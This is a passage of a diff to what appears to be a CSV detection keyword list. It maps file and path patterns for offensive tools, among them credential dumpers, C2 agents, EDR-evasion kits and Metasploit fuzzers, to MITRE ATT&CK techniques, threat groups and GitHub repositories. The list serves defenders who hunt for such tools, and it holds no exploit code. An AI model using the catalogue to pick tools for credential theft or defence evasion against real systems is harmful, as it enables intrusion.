APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" "*/FindObjects.cna*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike Beacon Object File (BOF) project which uses direct system calls to enumerate processes for specific loaded modules or process handles.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","10","10","263","50","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z" -"*/FindSQLSrv.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/FindSQLSrv.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/finger.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/fingerprint-strings.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/firefox_decrypt.git*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1622","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" -"*/firefox_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/firefox_decrypt.git*","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1624","283","2023-07-28T15:10:13Z","2014-01-17T13:25:02Z" +"*/firefox_decrypt.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*/firewalk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/firewall-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/flask:5000/supershell/*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*/flatten-macho.m*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/flask:5000/supershell/*","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*/flatten-macho.m*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/flume-master-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Fodetect-hooksx64*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*/follina.py*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" "*/ForgeCert.git*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "*/forkatz.filters*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" "*/forkatz.git*","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","10","2","122","15","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z" -"*/format:hashcat*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*/format:hashcat*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*/FourEye.git*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" "*/fox-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/fox-it/BloodHound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1538","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/fox-it/BloodHound*","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" "*/freelancer-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Freeze.rs*","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","7","665","70","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z" "*/freyja.go*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" "*/freyja_tcp/*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/fritzone/obfy*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","122","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*/fritzone/obfy*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" "*/ftp-anon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-bounce.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ftp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3632,45 +3646,46 @@ "*/full-nelson64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/FunctionalC2/*","offensive_tool_keyword","FunctionalC2","A small POC of using Azure Functions to relay communications","T1021.006 - T1132.002 - T1071.001","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/FortyNorthSecurity/FunctionalC2","1","1","N/A","10","10","58","15","2023-03-30T20:27:38Z","2020-03-12T17:54:50Z" "*/fuzz.txt*","offensive_tool_keyword","fuzz.txt","list of sensible files for fuzzing in system","T1210 - T1190 - T1203 - T1114","TA0002 - TA0003 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/fuzz.txt/blob/master/fuzz.txt","1","1","N/A","N/A","10","2669","479","2023-07-20T13:26:37Z","2016-01-19T13:35:44Z" -"*/fuzzers/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/ftp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/http*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/ntp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/smb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/smtp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/fuzzers/ssh*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/fuzzers/dns*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ftp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/http*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/ntp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/fuzzers/smtp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - 